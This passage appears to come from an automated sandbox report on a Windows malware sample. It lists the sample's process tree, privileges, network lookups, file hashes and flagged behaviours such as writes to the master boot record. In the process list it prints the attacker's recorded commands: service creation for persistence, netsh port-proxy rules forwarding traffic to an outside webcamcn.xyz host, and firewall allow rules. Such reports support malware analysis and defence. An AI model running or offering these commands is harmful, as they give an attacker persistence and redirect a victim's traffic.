| Token: SeChangeNotifyPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeMachineAccountPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreatePermanentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeChangeNotifyPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSyncAgentPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeEnableDelegationPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeCreateGlobalPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\var.exe
"C:\Users\Admin\AppData\Local\Temp\var.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Install\Install 6.1.9\install\Install.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\var.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1718127507 " AI_EUIMSI=""
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\DrvInst.exe
DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot18" "" "" "6792c44eb" "0000000000000000" "0000000000000594" "00000000000003DC"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 159FC0863C8142F8B2CFAD5EC2245620
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 580 -s 120
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 924 -s 120
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe
"C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe" start "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe"
C:\Windows\system32\cscript.exe
cscript C:\Users\Admin\16655\166557.vbs
C:\Windows\system32\cmd.exe
cmd /c cscript C:\Users\Admin\16655\166557.vbs
C:\Windows\system32\cscript.exe
cscript C:\Users\Admin\16655\166557.vbs
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe cscript C:\Users\Admin\16655\166557.vbs
C:\Windows\system32\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "1028" "756"
C:\Windows\system32\sc.exe
sc create 166557297 binPath= "C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\LetsPRO.exe" type= own start= auto displayname= 166557297
C:\Windows\system32\netsh.exe
netsh interface portproxy add v4tov4 listenport=443 connectaddress=103.214.147.31.webcamcn.xyz connectport=443
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Safe1" dir=in action=allow program="C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Safe2" dir=in action=allow program="C:\Users\GameSafe.exe"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Safe3" dir=in action=allow program="C:\Users\GameSafe2.exe"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="Safe4" dir=in action=allow program="C:\Users\GameSafe3.exe"
C:\Windows\system32\netsh.exe
netsh interface portproxy add v4tov4 listenport=80 connectaddress=hm2.webcamcn.xyz connectport=80
C:\Windows\system32\taskkill.exe
taskkill /f /t /im wegame.exe
C:\Windows\system32\taskkill.exe
taskkill /f /t /im WeGame.exe
C:\Program Files (x86)\WeGame\WeGame.exe
"C:\Program Files (x86)\WeGame\WeGame.exe"
C:\Program Files (x86)\WeGame\WeGame.exe
"C:\Program Files (x86)\WeGame\WeGame.exe"
C:\Program Files (x86)\WeGame\WeGame.exe
"C:\Program Files (x86)\WeGame\WeGame.exe"
C:\Program Files (x86)\WeGame\WeGame.exe
"C:\Program Files (x86)\WeGame\WeGame.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| N/A | 127.0.0.1:443 | tcp | |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| N/A | 127.0.0.1:443 | tcp | |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| N/A | 127.0.0.1:443 | tcp | |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| N/A | 127.0.0.1:443 | tcp | |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| N/A | 127.0.0.1:443 | tcp | |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| N/A | 127.0.0.1:443 | tcp | |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
| US | 8.8.8.8:53 | ied-tqos.wegamex.com.hk | udp |
| N/A | 127.0.0.1:443 | tcp | |
| US | 8.8.8.8:53 | 103.214.147.31.webcamcn.xyz | udp |
Files
memory/2196-0-0x0000000000200000-0x0000000000201000-memory.dmp
C:\Users\Admin\AppData\Roaming\Install\Install 6.1.9\install\Install.msi
| MD5 | 524c6546d99286d1a37ac9499035ceb9 |
| SHA1 | a0562541157d99adefc804c6079f33395c0b9d62 |
| SHA256 | 0cfef8ba27e2a2527be9675167659186c94dd4b0986aec491ccaa9ed213a4b0e |
| SHA512 | 26fdff49ac156b64b26bb42fa46917f379ed32d6849603bb5d08156c1ded509ee3c05d2f91d3a95707b05cb6c02b94ef2c03becc6f67b88c2c51e04ae0420491 |
C:\Windows\Installer\MSI35D0.tmp
| MD5 | 6119e62d8047032a715ba0670fc476c5 |
| SHA1 | 52e639024460bf111c469e95fb011c07d6fc89e8 |
| SHA256 | bc31f85266df2cdfdbe22149937105388fa3adc17e3646fa4a167736e819af77 |
| SHA512 | e7301fa21f01f7f7562b853e9bb246ed051951e3cef152bb0b3558d4863f141edbbc0c4d439c30f51f9997805490f131a5e4cd00872b61ccb08ba9d200f811d8 |
\Windows\Installer\MSI37E4.tmp
| MD5 | e7e51805794e1a71c5e2bdd45f4ee5c9 |
| SHA1 | d178d4c1deb28018a180ac3a6182e923660e16f5 |
| SHA256 | f6216d72f4d9a7d46f3b878650b2f26982e4f05b8b5ce363a60c564159db781f |
| SHA512 | 5632ceae01b6aad3d806bcdf2bdaf40e487cb3dc48d83597429dc4e9c5867a878a87ca06c3a2e43e8fc532295b5b8efbb472bd07c33f6b6629e877e3392eb576 |
C:\Windows\Installer\MSI3833.tmp
| MD5 | 0901970c2066aed8a97d75aaf1fd3146 |
| SHA1 | f0c700a4bfcebad9843e01a88bab71b5f38996d8 |
| SHA256 | 41f827e6addfc71d68cd4758336edf602349fb1230256ec135121f95c670d773 |
| SHA512 | 00e12fd2d752a01dfa75550ffaf3a2f337171cec93cd013083c37137a455e93bebd72e7d8487ec3e1de5fe22994f058829a6597765612278c20d601192cbe733 |
C:\Users\Admin\AppData\Roaming\Install\Install 6.1.9\install\Install1.cab
| MD5 | f1d5b53ebd72aa0372c5fc828d8794b3 |
| SHA1 | 4767a942af65c3d8366767f14a69d6192697e608 |
| SHA256 | 1e5b1dc6447932530edff0da158fa675324f4de502e85a2c8e89f566a9782312 |
| SHA512 | d22575da0c646f11135f87d377306dbe766be5101df332dae28ce7a7b8bdd7e0ff6878269ed83299a02c192a6e556ce117a23c52fdca0942332332160afbf6f7 |
C:\Program Files (x86)\Common Files\microsoft shared\VGX\LetsPRO.exe
| MD5 | 7bb188dfee179cbde884a0e7d127b074 |
| SHA1 | af351d674ec8515b4363b279c5ef803f7a4a3618 |
| SHA256 | 7c3308f04df19ecaa36818c4a49348e1d6921a43df5c53cb8131cc58e92889ed |
| SHA512 | 45df588d45cad6bce5dfb48626d7505140ec1c1beecb97e3f9393cb90a144ca09c1a4d4ded75fce18ac3c7dc6f5ca0b222574222bd746d60cb6068ef910a5c4b |
C:\Program Files (x86)\Common Files\microsoft shared\VGX\app-3.4.0\LetsPRO.exe
| MD5 | 93eadcdc2b275d749a70ccf1774e1bff |
| SHA1 | 444ec11e3d9512d2cba98a87b6d52a61c2c9f861 |
| SHA256 | 04aba1938bf72c36aad374fe2415e0fd0bc656d0cd5b53561c9defed40e40e35 |
| SHA512 | cbefaafcc85b6f1520c8b5610b8ef83fef54b80d35113fd138c7e1c03dfc411f49ee4cd2d0d5dc53920748ce68609843e20370f6ee2c7be5c4008e4928052a70 |
\Program Files (x86)\Common Files\microsoft shared\VGX\app-3.4.0\msvcr100.dll
| MD5 | ef3e115c225588a680acf365158b2f4a |
| SHA1 | ecda6d3b4642d2451817833b39248778e9c2cbb0 |
| SHA256 | 25d1cc5be93c7a0b58855ad1f4c9df3cfb9ec87e5dc13db85b147b1951ac6fa8 |
| SHA512 | d51f51336b7a34eb6c8f429597c3d685eb53853ee5e9d4857c40fc7be6956f1b8363d8d34bebad15ccceae45a6eb69f105f2df6a672f15fb0e6f8d0bb1afb91a |
C:\Program Files (x86)\Common Files\microsoft shared\VGX\app-3.4.0\1
| MD5 | 4d67c8f5ef8e40ad72add9ffd22e4abc |
| SHA1 | c55b71338b5ae5129fa8d39628a34f320dacc8af |
| SHA256 | 6222b03d83e0e82c8aa6c9e530af61cfa850a089db0321d921d759a55b5ee0fb |
| SHA512 | 5470a5a2a75fc30df6697c6adac40be79fae82103e5f001625dc929d1044d3d91f63243a1c8c73c6f89312fc4a2bfd5d761a06ef478ce535358d095f2cff6712 |
memory/2012-87-0x0000000010000000-0x0000000010F82000-memory.dmp
memory/2012-115-0x0000000010000000-0x0000000010F82000-memory.dmp
memory/2012-114-0x00000000002C0000-0x00000000002C1000-memory.dmp
memory/2012-112-0x00000000002C0000-0x00000000002C1000-memory.dmp
memory/2012-110-0x00000000002C0000-0x00000000002C1000-memory.dmp
memory/1676-128-0x0000000010000000-0x0000000010F82000-memory.dmp
memory/1676-126-0x0000000000220000-0x0000000000221000-memory.dmp
memory/1676-124-0x0000000000220000-0x0000000000221000-memory.dmp
memory/2672-134-0x0000000000230000-0x0000000000231000-memory.dmp
memory/2672-132-0x0000000000230000-0x0000000000231000-memory.dmp
memory/2672-135-0x0000000010000000-0x0000000010F82000-memory.dmp
memory/1736-151-0x0000000010000000-0x0000000010F82000-memory.dmp
memory/1736-150-0x00000000002A0000-0x00000000002A1000-memory.dmp
memory/1736-148-0x00000000002A0000-0x00000000002A1000-memory.dmp
C:\Config.Msi\f763557.rbs
| MD5 | a4500461f7b021e64c4e875932c29ff6 |
| SHA1 | 6cf7886cf711f4ba24802b4ae9544402718d2c7d |
| SHA256 | e3d31741844de717b49c92d34e6744e46916e69c319a401b7aac2ffaf1e9a596 |
| SHA512 | ecf23cd420dc4191cd30d7060de915c2aada1c5ab0b673b99ce929ad99d020d0357fa7ab4e41da9362884c1e8ee0c5bd8d2a9d2c5698e962d425dd0dbb7b41dc |
memory/352-203-0x0000000010000000-0x0000000010F82000-memory.dmp
memory/1028-285-0x000000001A170000-0x000000001A452000-memory.dmp
memory/1028-286-0x00000000009E0000-0x00000000009E8000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-14 17:41
Reported
2024-06-14 17:44
Platform
win10v2004-20240508-en
Max time kernel
150s
Max time network
147s
Command Line
Signatures
Creates new service(s)
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\J: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\N: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\X: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\U: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\W: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\I: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\L: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\V: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\R: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Users\Admin\AppData\Local\Temp\var.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\WeGame\Flag | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\WeGame\Flag | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\DeskUpdate\GlobalMgr.db | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\WeGame\Flag | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\DeskUpdate\GlobalMgr.db | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent\DeskUpdate\GlobalMgr.db | C:\Program Files (x86)\WeGame\WeGame.exe | N/A |
